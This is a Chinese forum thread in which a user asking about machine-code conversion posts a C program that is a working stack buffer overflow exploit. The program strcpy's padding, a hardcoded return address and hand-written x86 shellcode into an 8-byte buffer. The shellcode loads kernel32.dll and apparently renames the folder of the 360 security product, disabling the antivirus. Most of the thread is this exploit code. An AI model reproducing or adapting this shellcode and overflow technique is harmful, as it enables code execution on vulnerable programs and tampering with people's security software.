换编码_转_机器码_待解决

涛4091

地址为什么自动加上了 ff

人造人

贴代码

jackz007

     既然是地址，那就很可能是重定位项，从文件中读取到的数值和实际加载后的数值不一样很正常。

     楼主这是在切分汇编指令，自己动手写反汇编引擎？很 NB 嘛！

涛4091

jackz007 发表于 2019-5-10 17:36
既然是地址，那就很可能是重定位项，从文件中读取到的数值和实际加载后的数值不一样很正常。

      ...

写shellcode

涛4091

人造人 发表于 2019-5-10 17:35
贴代码

呐 代码

1. #include<windows.h>
   
2. #include<stdio.h>
   
3. 
   
4. char input[]=
   
5. "\x41\x41\x41\x41"
   
6. "\x41\x41\x41\x41"
   
7. "\x41\x41\x41\x41"
   
8. "\x6b\x8c\x49\x7e"
   
9. 
   
10. "\x55"
    
11. "\x8B\xEC"
    
12. "\x83\xEC\x20"
    
13. "\xB8\x6B\x65\x72\x6E"
    
14. "\x89\x45\xF0"
    
15. "\xB8\x65\x6C\x33\x32"
    
16. "\x89\x45\xF4"
    
17. "\xB8\x2E\x64\x6C\x6C"
    
18. "\x89\x45\xF8"
    
19. "\x8D\x45\xF0"
    
20. "\x50"
    
21. "\xBA\x7B\x1D\x80\x7C"
    
22. "\xFF\xD2"
    
23. "\x55"
    
24. "\x8B\xEC"
    
25. "\x83\xEC\x30"
    
26. "\xB8\x43\x3A\x5C\x5C"
    
27. "\x89\x45\xD0"
    
28. "\xB8\x50\x72\x6F\x67"
    
29. "\x89\x45\xD4"
    
30. "\xB8\x72\x61\x6D\x20"
    
31. "\x89\x45\xD8"
    
32. "\xB8\x46\x69\x6C\x65"
    
33. "\x89\x45\xDC"
    
34. "\xB8\x73\x5C\x5C\x33"
    
35. "\x89\x45\xE0"
    
36. "\xB8\x36\x30\x00\x00"
    
37. "\x89\x45\xE4"
    
38. "\x8D\x7D\xD0"
    
39. "\xB8\x43\x3A\x5C\x5C"
    
40. "\x89\x45\xE8"
    
41. "\xB8\x50\x72\x6F\x67"
    
42. "\x89\x45\xEC"
    
43. "\xB8\x72\x61\x6D\x20"
    
44. "\x89\x45\xF0"
    
45. "\xB8\x46\x69\x6C\x65"
    
46. "\x89\x45\xF4"
    
47. "\xB8\x73\x5C\x5C\x33"
    
48. "\x89\x45\xF8"
    
49. "\xB8\x36\x30\x31\x00"
    
50. "\x89\x45\xFC"
    
51. "\x8D\x75\xE8"
    
52. "\x56"
    
53. "\x57"
    
54. "\xB8\xA7\x5E\x83\x7C"
    
55. "\xFF\xD0";
    
56. 
    
57. 
    
58. int main()
    
59. {
    
60.         char buff[8];
    
61.         LoadLibrary("user32.dll");
    
62.         strcpy(buff,input);
    
63.         return 0;
    
64. }

复制代码